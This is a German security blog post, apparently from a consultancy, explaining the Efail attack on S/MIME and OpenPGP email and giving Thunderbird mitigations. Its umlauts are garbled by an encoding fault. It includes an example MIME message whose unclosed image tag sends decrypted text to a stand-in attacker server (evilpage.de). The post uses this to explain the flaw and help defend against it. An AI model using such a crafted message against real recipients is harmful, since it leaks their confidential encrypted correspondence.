Efail Logo

Efail - die Verschl├╝sselung lebt noch

Deutsche und niederl├Ąndische Sicherheitsforscher haben gestern vor einer neuen Schwachstelle namens Efail gewarnt. Durch sie werden angeblich die f├╝r E-Mails genutzten Verschl├╝sselungstechnologien S/MIME und OpenPGP gebrochen. Solche Methoden, die Ende-zu-Ende-Verschl├╝sselung m├Âglich machen, sind gerade f├╝r Journalisten, Aktivisiten oder Whisteblower wichtig. Neben der Vertraulichkeit und Authentizit├Ąt der Nachricht muss auch ihre Integrit├Ąt gesch├╝tzt werden. Und genau beim letzten Schutzziel setzen die Sicherheitsforscher an.

Der Efail-Angriff

Durch Efail werden zwei Angriffswege beschrieben, mit denen sich Informationen aus E-Mails ausleiten lassen: die direkte Ausleitung und die Ausleitung ├╝ber einen CBC/CFB Gadget Angriff. Bei beiden Wegen muss ein Angreifer eine verschl├╝sselte Nachricht manipulieren k├Ânnen, bevor sie vom Empf├Ąnger ge├Âffnet wird, der den privaten Schl├╝ssel zur Entschl├╝sselung besitzt. Der Angreifer versucht in die E-Mailnachricht ein externes Objekt, beispielsweise ein Bild, am Anfang einzubinden.

Beispiel f├╝r die Einbindung eines Bilds von einem fremden Server
<img src="https://evilpage.de/bild.jpg">

Solche Objekte rufen eine Adresse auf und laden Daten von einem entfernten Server herunter. Bei dem Angriff wird das schlie├čende Anf├╝hrungszeichen der Adresse jedoch erst nach dem Ende des verschl├╝sselten Teils der Nachricht gesetzt, wodurch der verschl├╝sselte Teil der Nachricht innerhalb der Adresse des externen Bilds steht.

Beispiel f├╝r die direkte Ausleitung von Informationen
--BOUNDARY
Content-Type: text/html

<img src="https://evilpage.de/bild.jpg
--BOUNDARY
Content-Transfer-Encoding: 7bit
Content-Type: application/pgp-encrypted

PDYrCxjq78SXY8WBQ95oBBwC0KTTYmSCxHKJiLFOI89fPL6bncIpO…

--BOUNDARY
Content-Type: text/html
">
<img src="https://evilpage.de/bild.jpg
Geheime Information
">

├ľffnet der E-Mail-Empf├Ąnger die Nachricht, wird zun├Ąchst der verschl├╝sselte Teil entschl├╝sselt. Dieser steht nun vollst├Ąndig entschl├╝sselt im Adressteil des Bilds, welches gegebenenfalls geladen wird. Damit w├╝rde die Adresse mit dem gesamten, geheimen Nachrichteninhalt aufgerufen und dadurch an den Server des Angreifers geschickt werden.

Schutzm├Âglichkeiten

  1. Wer keine externen Inhalte nachl├Ądt, ├╝bertr├Ągt auch keine Daten an fremde Server. Diese Einstellung sollte ohnehin bereits aktiviert sein, um die eigene Privatsph├Ąre vor ├ľffnungstracking zu sch├╝tzen. Allerdings wird bei dieser Einstellung der Inhalt der Nachricht nicht richtig oder nur unvollst├Ąndig dargestellt. Bei Thunderbird kann das Nachladen externer Inhalte ├╝ber Einstellungen - Datenschutz - Externe Inhalte in Nachrichten erlauben verboten werden.
  2. Die Forscher haben auch einige Schwachstellen in E-Mail-Clients gefunden, die trotz der Blockierung des Nachladens externer Inhalten, eine Ausleitung von Informationen an einen Angreifer erlauben. Daher sollte zus├Ątzlich HTML-Rendering deaktiviert werden, bis Hersteller von E-Mail-Clients eine L├Âsung erarbeitet haben. Bei Thunderbird erfolgt diese Einstellung ├╝ber Ansicht - Nachrichteninhalt - Reiner Text.
  3. Um die Manipulation der Nachricht auf dem Transportweg zu erschweren, sollte darauf geachtet werden eine TLS-Kommunikationsverschl├╝sselung bei der ├ťbertragung zu verwenden. IT-Sicherheitsverantwortliche und Administratoren sollten hierauf beim Betrieb der E-Mail-Infrastruktur besonderen Wert legen.

Fazit

Die Ank├╝ndigung von Efail war fast filmreif. Einige vermuteten beim ersten Tweet schon einen schwerwiegenden Fehler im Verfahren von OpenPGP oder S/MIME, durch den Remote Code Executions auf den Rechnern der Empf├Ąnger m├Âglich werden oder an den Grundpfeilern der Verschl├╝sselung ger├╝ttelt w├╝rde. Gl├╝cklicherweise hat sich gezeigt, dass Efail zwar ein ernst zu nehmender Versuch ist, um an verschl├╝sselte Daten zu gelangen. Andererseits stellt Efail einen komplexen Angriff dar, und es mag einfachere Wege geben, um an sensitive Informationen zu gelangen.

Au├čerdem entsteht der Eindruck, die E-Mail-Verschl├╝sselung sei unsicher. Wer bisher seine sensitiven Nachrichten nicht verschl├╝sselt, der wird ohnehin von ganz anderen Gefahren bedroht. Verschl├╝sselte E-Mail-Kommunikation kann im Rahmen eines ├╝blichen Bedrohungsmodells sicher eingesetzt werden und sollte bei Unternehmen und staatlichen Stellen mehr Verwendung finden. Wer Unterst├╝tzung bei der Einrichtung ben├Âtigt, findet qualifizierte Hilfe bei unseren Experten.


Wo ist die Knautschzone von IT-Systemen?

Sol­len Siche­rheits­vor­f├Ąlle ver­hin­dert oder er­war­tet wer­den? Die­se Fra­ge be­ant­wortet ara­mido-Ge­sch├Ąfts­f├╝hrer An­dre­as Sperber auf in­for­ma­tik-aktuell.de (weiterlesen)